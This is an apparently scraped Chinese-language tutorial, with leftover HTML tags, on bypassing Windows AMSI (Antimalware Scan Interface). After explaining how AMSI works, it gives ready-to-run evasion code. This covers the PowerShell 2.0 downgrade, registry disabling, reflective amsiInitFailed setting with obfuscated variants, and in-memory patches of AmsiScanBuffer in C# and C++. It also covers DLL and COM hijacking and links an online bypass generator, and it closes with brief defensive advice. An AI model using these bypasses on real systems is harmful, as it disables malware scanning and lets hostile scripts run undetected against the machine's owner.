AMSI绕过技术全面指南<\/h1>

1. AMSI基础概念<\/h2>

1.1 什么是AMSI<\/h3>
AMSI (Antimalware Scan Interface)是微软开发的反恶意软件扫描接口标准，主要特性包括：<\/p>
通用接口标准，允许应用程序与服务与机器上的反恶意软件产品集成<\/li>
提供增强的恶意软件保护，特别是针对脚本和动态代码<\/li>
支持文件和内存\/流扫描、内容源URL\/IP信誉检查等技术<\/li>
支持会话概念，关联不同扫描请求以增强检测能力<\/li> <\/ul>
1.2 AMSI工作原理<\/h3>
当用户执行脚本或启动PowerShell时，AMSI.dll被动态加载到内存空间<\/li>
在执行前，防病毒软件使用以下API扫描缓冲区和字符串：
AmsiScanBuffer()<\/code><\/li>
AmsiScanString()<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
1.3 AMSI集成组件<\/h3>
AMSI已集成到以下Windows组件中：<\/p>

用户账户控制(UAC) - %windir%\System32\consent.exe<\/code><\/li>
PowerShell - System.Management.Automation.dll<\/code><\/li>
Windows脚本宿主 - wscript.exe<\/code>, cscript.exe<\/code><\/li>
JavaScript\/VBScript - %windir%\System32\jscript.dll<\/code>, %windir%\System32\vbscript.dll<\/code><\/li>
Office VBA宏 - VBE7.dll<\/code><\/li>
.NET Assembly - clr.dll<\/code><\/li>
WMI - %windir%\System32\wbem\fastprox.dll<\/code><\/li>
<\/ol>
2. AMSI绕过技术详解<\/h2>
2.1 降级攻击<\/h3>
原理<\/strong>：PowerShell 2.0没有AMSI功能<\/p>
实施方法<\/strong>：<\/p>

检查当前PowerShell版本：
$PSVersionTable
<\/span><\/span><\/code><\/pre><\/li>
判断能否使用PowerShell 2.0：

非管理员权限：
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP'<\/span> -recurse | Get-ItemProperty -name Version -EA 0 | Where { $_.PSChildName -match<\/span> '^(?!S)\p{L}'<\/span>} | Select -ExpandProperty Version
<\/span><\/span><\/code><\/pre><\/li>
管理员权限：

Win10:
Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2
<\/span><\/span><\/code><\/pre><\/li>
Win2016\/Win2019:
Get-WindowsFeature PowerShell-V2
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
使用PowerShell 2.0执行：
powershell.exe -version 2
<\/span><\/span><\/code><\/pre>或在脚本开头添加：
#requires -version 2<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.2 注册表禁用AMSI<\/h3>
方法<\/strong>：<\/p>
Remove-Item -Path "HKLM:\Software\Microsoft\Windows Script\Settings\AmsiEnable"<\/span> -Recurse
<\/span><\/span><\/code><\/pre>或设置注册表：<\/p>
HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable = 0
<\/code><\/pre>
限制<\/strong>：<\/p>

需要管理员权限<\/li>
不够隐蔽<\/li>
<\/ul>
2.3 反射式AMSI禁用<\/h3>
基础方法<\/strong>：<\/p>
[Ref]<\/span>.Assembly.GetType('System.Management.Automation.AmsiUtils'<\/span>).GetField('amsiInitFailed'<\/span>,'NonPublic,Static'<\/span>).SetValue($null,$true)
<\/span><\/span><\/code><\/pre>绕过检测的编码方法<\/strong>：<\/p>


字符串拆分编码：<\/p>
$a="5492868772801748688168747280728187173688878280688776828"<\/span>
<\/span><\/span>$b="1173680867656877679866880867644817687416876797271"<\/span>
<\/span><\/span>
<\/span><\/span>$c=[string]<\/span>(0..37|%{[char][int]<\/span>(29+($a+$b).substring(($_*2),2))})-replace<\/span> " "<\/span>
<\/span><\/span>$d=[Ref]<\/span>.Assembly.GetType($c)
<\/span><\/span>
<\/span><\/span>$e=[string]<\/span>(38..51|%{[char][int]<\/span>(29+($a+$b).substring(($_*2),2))})-replace<\/span> " "<\/span>
<\/span><\/span>$f=$d.GetField($e,'NonPublic,Static'<\/span>)
<\/span><\/span>
<\/span><\/span>$f.SetValue($null,$true)
<\/span><\/span><\/code><\/pre><\/li>

HEX编码：<\/p>
[Ref]<\/span>.Assembly.GetType('System.Management.Automation.'<\/span>+$("41 6D 73 69 55 74 69 6C 73"<\/span>.Split(" "<\/span>)|forEach<\/span>{[char]<\/span>([convert]<\/span>::toint16($_,16))}|forEach<\/span>{$result=$result+$_};$result)).GetField($("61 6D 73 69 49 6E 69 74 46 61 69 6C 65 64"<\/span>.Split(" "<\/span>)|forEach<\/span>{[char]<\/span>([convert]<\/span>::toint16($_,16))}|forEach<\/span>{$result2=$result2+$_};$result2),'NonPublic,Static'<\/span>).SetValue($null,$true)
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.4 内存补丁技术<\/h3>
API调用顺序<\/strong>：<\/p>

AmsiInitialize<\/code> - 初始化AMSI API<\/li>
AmsiOpenSession<\/code> - 打开session<\/li>
AmsiScanBuffer<\/code> - 扫描用户输入<\/li>
AmsiCloseSession<\/code> - 关闭session<\/li>
AmsiUninitialize<\/code> - 删除AMSI API<\/li>
<\/ol>
补丁目标<\/strong>：<\/p>

修改AmsiScanBuffer<\/code>或AmsiOpenSession<\/code>函数，使其返回负数(如0x80070057<\/code>)<\/li>
<\/ul>
PowerShell实现<\/strong>：<\/p>
$p=@"
<\/span><\/span><\/span>using System;
<\/span><\/span><\/span>using System.Linq;
<\/span><\/span><\/span>using System.Runtime.InteropServices;
<\/span><\/span><\/span>public class Program{
<\/span><\/span><\/span>[DllImport("kernel32")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
<\/span><\/span><\/span>[DllImport("kernel32")]public static extern IntPtr LoadLibrary(string name);
<\/span><\/span><\/span>[DllImport("kernel32")]public static extern IntPtr VirtualProtect(IntPtr lpAddress, UIntPtr dwSize,uint flNewProtect, out uint lpfloldProtect);
<\/span><\/span><\/span>public static void Bypass(){
<\/span><\/span><\/span>String a ="isma";
<\/span><\/span><\/span>String b ="reffuBnacSismA";
<\/span><\/span><\/span>IntPtr lib = LoadLibrary(String.Join("", a.Reverse().ToArray()) +".dll");
<\/span><\/span><\/span>IntPtr addr = GetProcAddress(lib, String.Join("",b.Reverse().ToArray()));
<\/span><\/span><\/span>uint old = 0;
<\/span><\/span><\/span>byte[] p;
<\/span><\/span><\/span>p = new byte[6];
<\/span><\/span><\/span>p[0] = 0xB8;
<\/span><\/span><\/span>p[1] = 0x57;
<\/span><\/span><\/span>p[2] = 0x00;
<\/span><\/span><\/span>p[3] = 0x07;
<\/span><\/span><\/span>p[4] = 0x80;
<\/span><\/span><\/span>p[5] = 0xc3;
<\/span><\/span><\/span>VirtualProtect(addr, (UIntPtr)p.Length, 0x04, out old);
<\/span><\/span><\/span>Marshal.Copy(p, 0, addr, p.Length);
<\/span><\/span><\/span>VirtualProtect(addr, (UIntPtr)p.Length, old, out old);
<\/span><\/span><\/span>}}
<\/span><\/span><\/span>"@<\/span>
<\/span><\/span>Add-Type $p
<\/span><\/span>[Program]<\/span>::Bypass()
<\/span><\/span><\/code><\/pre>C++实现<\/strong>：<\/p>
#include<\/span> <Windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    STARTUPINFOA si =<\/span> { 0<\/span> };
<\/span><\/span>    PROCESS_INFORMATION pi =<\/span> { 0<\/span> };
<\/span><\/span>    si.cb =<\/span> sizeof<\/span>(si);
<\/span><\/span>    
<\/span><\/span>    CreateProcessA(NULL, (LPSTR)"powershell -NoExit dir"<\/span>, NULL, NULL, NULL, NULL, NULL, NULL, &<\/span>si, &<\/span>pi);
<\/span><\/span>    
<\/span><\/span>    HMODULE hAmsi =<\/span> LoadLibraryA("amsi.dll"<\/span>);
<\/span><\/span>    LPVOID pAmsiScanBuffer =<\/span> GetProcAddress(hAmsi, "AmsiScanBuffer"<\/span>);
<\/span><\/span>    
<\/span><\/span>    Sleep(500<\/span>);
<\/span><\/span>    
<\/span><\/span>    DWORD oldProtect;
<\/span><\/span>    char<\/span> patch =<\/span> 0xc3<\/span>;
<\/span><\/span>    VirtualProtectEx(pi.hProcess, (LPVOID)pAmsiScanBuffer, 1<\/span>, PAGE_EXECUTE_READWRITE, &<\/span>oldProtect);
<\/span><\/span>    WriteProcessMemory(pi.hProcess, (LPVOID)pAmsiScanBuffer, &<\/span>patch, sizeof<\/span>(char<\/span>), NULL);
<\/span><\/span>    VirtualProtectEx(pi.hProcess, (LPVOID)pAmsiScanBuffer, 1<\/span>, oldProtect, NULL);
<\/span><\/span>    
<\/span><\/span>    CloseHandle(pi.hProcess);
<\/span><\/span>    CloseHandle(pi.hThread);
<\/span><\/span>    FreeLibrary(hAmsi);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.5 DLL劫持技术<\/h3>
原理<\/strong>：<\/p>

利用LoadLibrary<\/code>函数在没有绝对路径时优先从当前目录加载DLL的特性<\/li>
在powershell.exe<\/code>同目录下放置恶意amsi.dll<\/code><\/li>
<\/ul>
要求<\/strong>：<\/p>

劫持的DLL需要包含所有导出函数<\/li>
可以使用Aheadlib工具生成或手动实现<\/li>
<\/ul>
2.6 COM Server劫持(已失效)<\/h3>
原方法<\/strong>：<\/p>
Windows Registry Editor Version 5.00
<\/span><\/span>
<\/span><\/span>[<\/span>HKEY_CURRENT_USER\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}]<\/span>
<\/span><\/span>[<\/span>HKEY_CURRENT_USER\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32]<\/span>
<\/span><\/span>@<\/span>=<\/span>"C:\\goawayamsi.dll"<\/span>
<\/span><\/span><\/code><\/pre>3. 其他资源<\/h2>

在线AMSI绕过生成平台：https:\/\/amsi.fail\/<\/li>
支持AMSI的杀毒软件列表：https:\/\/github.com\/subat0mik\/whoamsi\/<\/li>
<\/ol>
4. 防御建议<\/h2>

禁用PowerShell 2.0<\/li>
监控注册表关键项修改<\/li>
检测内存补丁行为<\/li>
实施DLL加载路径保护<\/li>
保持系统和安全软件更新<\/li>
<\/ol>
5. 总结<\/h2>
AMSI绕过技术不断发展，从最初的简单方法到现在的复杂混淆和内存操作技术。防御方需要多层次防护，包括行为监控、内存保护和系统加固。红队人员应持续研究新技术，同时蓝队需要了解这些技术以构建更强大的防御体系。<\/p>